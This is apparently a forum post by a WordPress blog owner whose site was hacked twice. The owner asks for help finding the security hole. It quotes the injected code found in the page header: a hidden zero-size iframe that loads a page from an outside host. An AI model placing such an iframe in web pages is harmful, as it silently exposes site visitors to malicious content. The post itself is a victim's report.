I run Bitsblog.florack.us.
I recently came under attack by person or persons unknown. Apparently there's a security hole either at my site are within word press, and I can't figure which.
the first sign I had that there had been an attack, was that I could not get into my editor. On looking at the HTML output, I found four lines all the same at the header of the HTML.
(IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe)
I was unable to find any reference to this address in any of my PHP files. I must assume that the hacker has somehow gotten into my database.
This first happened at the middle of last week. After a night of fooling around trying to locate the problem I threw up my hands and asked the ISP to wipe and restore from tape, from a week previous. Once they did that, I've been ran all the latest WordPress upgrades.
Whatever this attack is, it apparently is not solved by the wordpress upgrade. I say this, because I was attacked again last evening. My site is currently down.
In doing a cross reference via Google, I find that there are a few people who are running into the same problem, mostly in Germany and Portugal. However, they seem as mystified as I am, passed coming up with the idea that there is some kind of vulnerability within the web servers implementation of PHP.
I am told, that the web server I'm on is Windows IIS, though the version I don't know.
my website is currently down, and I'm in need of some help, not only to get it running again, but to close the security hole.
Any ideas, anyone?